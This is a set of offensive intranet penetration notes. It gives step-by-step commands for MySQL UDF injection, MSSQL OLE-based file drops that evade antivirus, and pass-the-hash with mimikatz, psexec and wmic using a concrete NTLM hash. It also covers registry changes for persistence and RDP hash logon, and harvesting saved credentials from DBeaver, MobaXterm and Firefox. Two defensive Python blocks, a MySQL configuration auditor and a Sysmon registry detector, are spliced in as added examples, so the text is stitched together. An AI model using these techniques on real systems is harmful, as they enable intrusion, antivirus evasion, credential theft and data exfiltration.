Title: Intranet penetration notes (a running account)


0x00 Environment

Linux host, www privileges. The host cannot reach the external network, a forward proxy cannot be used, and the intranet is a class-B segment.

0x01 Collect information

Use F-Scrack.py to find Redis, ES and similar services.

PS: F-Scrack.py's mssql module is inaccurate when brute-forcing; you can write a simple one yourself.

python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6

1. Redis

Do not use keys * when there are many keys.

View basic information: master/slave role, number of keys, version number.

Use scan to list keys: scan 0 match * count 100

View a key's type: type key

Hash type: hgetall key

2. MySQL

On Windows, first test whether the plugin directory is writable:

select @@plugin_dir;

select 'hello' into outfile '<plugin_dir>'; -- replace <plugin_dir> with a file path inside the directory returned above

If that works, take the UDF shipped with msf, convert it to hexadecimal first, and then export it into the plugin directory:

use test;

set @a=concat('',0xhex_of_exe); -- hex_of_exe: the hex dump of the DLL

create table Ghost(data LONGBLOB);

insert into Ghost values('');

update Ghost set data=@a;

select data from Ghost into DUMPFILE dir; -- dir: the quoted full path of the DLL inside the plugin directory

create function sys_eval returns string soname 'sys_eval.dll';

drop function sys_eval; -- delete it after use and make that a habit. Prefer sys_eval; try not to use sys_exec (it will crash)
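The write test above only succeeds when the server's file-export settings and the account's privileges both allow it, and those two settings are exactly what a defender should audit. The following is an added example (not code from the original post) that evaluates the MySQL rules I am confident of: a NULL secure_file_priv disables INTO OUTFILE/DUMPFILE entirely, an empty string places no restriction, and a directory restricts exports to that directory and below; the FILE privilege is global-only, so it can only come from a grant on *.*. The SHOW VARIABLES / SHOW GRANTS values are constructed samples; assess(), has_file_privilege() and plugin_dir_exportable() are names chosen here.

```python
import re

# Constructed sample inputs: the values a defender would pull with
# SHOW VARIABLES and SHOW GRANTS. A NULL secure_file_priv arrives from the
# MySQL connector as Python None.
SAMPLE_LINUX_OPEN = {
    "variables": {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"},
    "grants": ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"],
}
SAMPLE_LINUX_DEFAULT = {
    "variables": {"secure_file_priv": "/var/lib/mysql-files/",
                  "plugin_dir": "/usr/lib/mysql/plugin/"},
    "grants": ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'"],
}
SAMPLE_WINDOWS_OPEN = {
    "variables": {"secure_file_priv": "",
                  "plugin_dir": "C:\\Program Files\\MySQL\\MySQL Server 5.7\\lib\\plugin\\"},
    "grants": ["GRANT FILE ON *.* TO 'app'@'%'",
               "GRANT SELECT, INSERT ON app.* TO 'app'@'%'"],
}
SAMPLE_NO_FILE_PRIV = {
    "variables": {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"},
    "grants": ["GRANT SELECT, INSERT, UPDATE ON app.* TO 'app'@'%'"],
}


def _norm(path: str) -> str:
    """Normalise a directory path for prefix comparison: backslashes become
    slashes, trailing slashes are dropped, Windows drive paths are lower-cased."""
    p = path.replace("\\", "/").rstrip("/")
    if re.match(r"^[A-Za-z]:", p):
        p = p.lower()
    return p


def has_file_privilege(grants) -> bool:
    """True if any grant on *.* carries FILE or ALL PRIVILEGES.
    FILE is a global privilege, so database-scoped grants never confer it."""
    for g in grants:
        m = re.match(r"GRANT\s+(.*?)\s+ON\s+\*\.\*\s", g, re.IGNORECASE)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            return True
    return False


def plugin_dir_exportable(secure_file_priv, plugin_dir: str) -> bool:
    """Can SELECT ... INTO OUTFILE/DUMPFILE land a file inside plugin_dir?
    None -> import/export disabled; '' -> unrestricted;
    a path -> only files at or below that directory."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    sfp, pd = _norm(secure_file_priv), _norm(plugin_dir)
    return pd == sfp or pd.startswith(sfp + "/")


def assess(host: dict) -> dict:
    """Combine both conditions: a UDF can only be written from SQL when the
    account holds FILE and secure_file_priv lets exports reach plugin_dir."""
    v = host["variables"]
    exportable = plugin_dir_exportable(v.get("secure_file_priv"), v["plugin_dir"])
    file_priv = has_file_privilege(host["grants"])
    at_risk = exportable and file_priv
    return {
        "plugin_dir_exportable": exportable,
        "file_privilege": file_priv,
        "udf_write_possible": at_risk,
        "fix": ("set secure_file_priv to a dedicated directory (or NULL) and "
                "revoke FILE from application accounts") if at_risk else "no action needed",
    }


if __name__ == "__main__":
    for name, host in [("linux-open", SAMPLE_LINUX_OPEN),
                       ("linux-default", SAMPLE_LINUX_DEFAULT),
                       ("windows-open", SAMPLE_WINDOWS_OPEN),
                       ("no-file-priv", SAMPLE_NO_FILE_PRIV)]:
        print(name, assess(host))
```

This covers the server-side configuration only; the filesystem ACL on the plugin directory for the MySQL service account is the other half, and that is what the write test in the post actually exercises.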

3. mssql

Leave mssql brute-forcing as late as possible, because it is noisy.

After the mssql brute-force succeeds, it is best to use CLR to obtain privileges. Calling `xp_cmdshell` directly will be killed, and 360 will intercept it.

With the mssql user's password known, certutil and similar tools will be intercepted or will trigger alerts, so use the facilities mssql itself provides to write to disk:

First enable the OLE Automation stored procedures:

sp_configure 'show advanced options', 1;

GO

RECONFIGURE;

GO

sp_configure 'Ole Automation Procedures', 1;

GO

RECONFIGURE;

mssql writes large files

For example, an exe is converted to hex first and then written to a file:

xxd -plain /tmp/test.exe | tr -d '\n' > /tmp/dll.hex

declare @hexstring varchar(max);

set @hexstring='hex after conversion';

declare @file varbinary(max);

set @file=(select cast('' as xml).value('xs:hexBinary( substring(sql:variable('@hexstring'), sql:column('t.pos')) )', 'varbinary(max)')

from (select case substring(@hexstring, 1, 2) when '0x' then 3 else 0 end) as t(pos));

select @file;

declare @init int;

declare @filepath nvarchar(4000)=N'c:\22.exe';

EXEC sp_OACreate 'ADODB.Stream', @init OUTPUT; -- An instance created

EXEC sp_OASetProperty @init, 'Type', 1;

EXEC sp_OAMethod @init, 'Open'; -- Calling a method

EXEC sp_OAMethod @init, 'Write', NULL, @file; -- Calling a method

EXEC sp_OAMethod @init, 'SaveToFile', NULL, @filepath, 2; -- Calling a method

EXEC sp_OAMethod @init, 'Close'; -- Calling a method

EXEC sp_OADestroy @init; -- Closed the resources

4. mssql backup

BACKUP DATABASE db

TO DISK='C:\Windows\temp\db.bak' WITH COMPRESSION, INIT, STATS=5;

Split compression with rar:

rar.exe a -m0 -v100m C:\windows\temp\db.split C:\windows\tasks\db.bak

download C:\windows\temp\db.split.rar /var/tmp/

6. pth

wmi

wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig > d:\result.txt"

It is recommended to use wmiexec.vbs:

https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs

cscript C:\Windows\Tasks\aliwmi.vbs /cmd ip "C:\Windows\system32\calc.exe"

msf

use exploit/windows/smb/psexec

show options

set RHOST 192.168.81.129

set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

set SMBUser Administrator

show options

run

mimikatz || Cobalt Strike

mimikatz.exe privilege::debug "sekurlsa::pth /domain: /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF /run:cmd.exe" // pass the hash

psexec

psexec /accepteula // accept the license agreement

sc delete psexesvc

psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

psexec.vbs

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig" // remote command execution

sc

net use \\192.168.17.138\c$ "admin123" /user:pt007

net use

dir \\192.168.17.138\c$

copy test.exe \\192.168.17.138\c$

sc \\192.168.17.138 create test binpath= "c:\test.exe"

sc \\192.168.17.138 start test

sc \\192.168.17.138 delete test

9 ways to remotely execute cmd in Windows: https://xz.aliyun.com/t/5957

0x03 Access is denied

For any account other than RID 500, the token obtained is a medium-integrity token, whether wmi, psexec or another method is used; with wmiexec this shows up as Access is Denied.

Once a hash has been dumped, the registry can be modified so that all members of the local administrators group can connect remotely, which also serves as persistence:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

RDP PTH

When the dumped hash cannot be cracked and you want to log in to RDP with the hash, the system being logged in to needs "Restricted Admin Mode" enabled. It is enabled by default on Windows 8.1 and Windows Server 2012 R2; Windows 7 and Windows Server 2008 need the KB2871997 and KB2973351 updates installed.

1. Start RDP

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

(0xd3d = 3389, i.e. listen on port 3389)

Turn on 3389:

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

2. Turn on Restricted Admin mode

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

3. Add firewall rules

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=TCP localport=3389 action=allow
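Every step of the procedure above is a registry value being set, which makes it a clean detection target. The following is an added example (not code from the original post) that runs over Sysmon Event ID 13 (RegistryEvent: value set) records and flags the four changes described in this section: LocalAccountTokenFilterPolicy set to 1, DisableRestrictedAdmin set to 0, fDenyTSConnections set to 0, and any write to the RDP-Tcp PortNumber. The field names EventID, Image, TargetObject and Details are the ones Sysmon uses; the event records themselves are constructed for the example, and scan(), check_event() and parse_dword() are names chosen here.

```python
import re

# Constructed Sysmon Event ID 13 records in the shape Sysmon emits. The first
# four mirror the registry changes made in this section; the last is benign noise.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
     "Details": "DWORD (0x00000d3d)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{guid}\\DhcpIPAddress",
     "Details": "10.0.0.5"},
]

# (lower-cased key suffix, predicate on the DWORD value, finding text)
RULES = [
    ("\\policies\\system\\localaccounttokenfilterpolicy", lambda v: v == 1,
     "remote UAC token filtering disabled: every local admin gets a full token "
     "over the network (pass-the-hash friendly)"),
    ("\\control\\lsa\\disablerestrictedadmin", lambda v: v == 0,
     "Restricted Admin mode enabled: RDP will accept logon with an NTLM hash"),
    ("\\control\\terminal server\\fdenytsconnections", lambda v: v == 0,
     "Remote Desktop connections enabled"),
    ("\\terminal server\\winstations\\rdp-tcp\\portnumber", lambda v: True,
     "RDP listener port set to {value}"),
]


def parse_dword(details: str):
    """Sysmon renders DWORD values as 'DWORD (0x00000001)'; return the int or None."""
    m = re.fullmatch(r"DWORD \((0x[0-9a-fA-F]+)\)", details.strip())
    return int(m.group(1), 16) if m else None


def normalize_key(path: str) -> str:
    """Fold the two spellings of the hive and case so suffix matching is stable."""
    return path.replace("HKEY_LOCAL_MACHINE", "HKLM").lower()


def check_event(event: dict):
    """Return a finding dict for a matching registry write, else None."""
    if event.get("EventID") != 13:
        return None
    value = parse_dword(event.get("Details", ""))
    if value is None:
        return None
    target = normalize_key(event["TargetObject"])
    for suffix, hits, message in RULES:
        if target.endswith(suffix) and hits(value):
            return {"key": event["TargetObject"], "value": value,
                    "image": event.get("Image"),
                    "finding": message.format(value=value)}
    return None


def scan(events):
    """Apply check_event to a stream of records and keep the findings."""
    return [f for f in map(check_event, events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['image']}: {finding['finding']} [{finding['key']}]")
```

Each finding keeps the writing process image, so the same rules can be weighted by whether the write came from reg.exe, wmic.exe or a policy engine; the PortNumber rule fires on any write because a port change is rare enough in normal operation to be worth a look even when the value is the default 3389.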

0x04 Dump passwords

dbeaver

dbeaver 6 configuration files (the storage location and decryption method differ between versions):

# Encrypted password storage:

C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json

# URL and username:

C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json

Decryption script: https://gist.github.com/felipou/50b60309f99b70b1e28f6d22da5d8e61

After downloading credentials-config.json and the script, decrypt with python: python decrypt.py credentials-config.json, then look up the corresponding IP and username in data-sources.json by the decrypted id.

Older versions store the password in C:\Users\users\.dbeaver4\General\.dbeaver-data-source.xml, which can be decrypted directly online: http://dbeaver-password-decrypter.s3-website-us-west-2.amazonaws.com/

0x05 MobaXterm

There is a .ini file containing the corresponding IP information and the path of the private key.

Old version storage: C:\Users\%USERNAME%\AppData\Roaming\MobaXterm

2020 version: C:\Users\%USERNAME%\Documents\MobaXterm

0x05 VSCODE

On Windows the configuration file is here:

%APPDATA%\Code\User\settings.json; from the configuration file you can find storage locations such as notes and ssh settings.

0x06 Firefox

Master Sanhao has already described this in detail; I chose to use firepwd.py:

Firefox profile directory:

%APPDATA%\Mozilla\Firefox\Profiles\
